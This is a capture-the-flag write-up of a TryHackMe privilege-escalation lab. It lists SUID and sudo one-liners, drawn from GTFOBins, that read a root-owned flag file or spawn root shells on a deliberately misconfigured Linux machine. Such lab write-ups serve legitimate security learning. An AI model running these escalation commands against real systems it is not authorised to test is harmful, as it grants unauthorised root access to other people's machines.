Hello, there and it has been a while since my last update, welcome back to another THM CTF writeup. Today, we are going for the most easiest Privilege Escalate (privesc) in the entire THM server. Just like the author, SherlockSec mentioned, there are tons of ways to privesc the machine. Just a small tip, I referred the GTFObin for this challenge. The site contains a list of shell-escaping command. Furthermore, I break the write-up into two major sections, the SUID and the SUDO. Without further ado, let’s get started.
Part 1: SUID
SUID exploitation is quite common in Linux especially users misconfigure the important /bin and /sbin files. If you wanted to know more about SUID exploitation, you can refer to this article. To do a quick search on the SUID files on the system file, simply use the following command
$ find / -perm /4000 2>/dev/null
The perm 4000 represents permission 4000 which is an SUID bit and we are going to skip all ‘permission denied’ search by using 2>/dev/null/. Alternatively, you also can use mnemonic shortcuts.
$ find / -perm /u=s 2>/dev/null
Well, there are tons of SUID to exploit with. Always check with the GTFObins and look for the possible SUID file exploitation. Here is the list of SUID that can be exploited.
- …… and anything you can find on GTFObins.
For this instance, I’m going to show you the 12 SUID exploitation as a demo and you can figure out the rest using GTFObins.
SUID 1: arp
$ /usr/sbin/arp -v -f /root/flag.txt
SUID 2: cut
$ /usr/bin/cut -d "" -f1 /root/flag.txt
SUID 3: base64
$ /usr/bin/base64 /root/flag.txt | base64 --decode
SUID 4: tail
$ /usr/bin/tail /root/flag.txt
SUID 5: ul
$ /usr/bin/ul /root/flag.txt
SUID 6: shuf
Instead of reading the flag file like the previous SUID, shuf is used to overwrite the file. This SUID command is quite useful to rewrite the configuration file which cannot be done by lower privileged users. No demo for this SUID.
SUID 7: php5
$ /usr/bin/php5 -r "pcntl_exec('/bin/sh');"
SUID 8: file
$ /usr/bin/file -m /root/flag.txt
SUID 9: tclsh8.5
$ /usr/bin/tclsh8.5 % exec cat /root/flag.txt
SUID 10: env
$ /usr/bin/env /bin/sh
SUID 11: diff
$ /usr/bin/diff --line-format=%L /dev/null /root/flag.txt
SUID 12: strace
$ /usr/bin/strace -o /dev/null /bin/sh
Part 2: Sudo
Another privilege escalation method is sudo command. Just small tips here, always check with the ./etc/sudoers or visudo command to check for any misconfiguration on user privilege. To check with the sudo command of a lower privilege user, simply punch in the following line.
$ sudo -l
Actually it is rare to see this kind of stuff in real life. The lower privilege user literally can run anything as sudo. Similarly, you can check the GTFObins for sudo shell-escape. For this demo, I’m going to use the command sudo command, the bash.
$ sudo /bin/bash
That’s all for the quick write-up for privesc playground. GTFObins is definitely a useful site to check with the priv escalation in terms of SUID and SUDO. One more thing, check out mzfr’s GTFObins tool, he did a great job on beautifying the tool via terminal. Until next time 🙂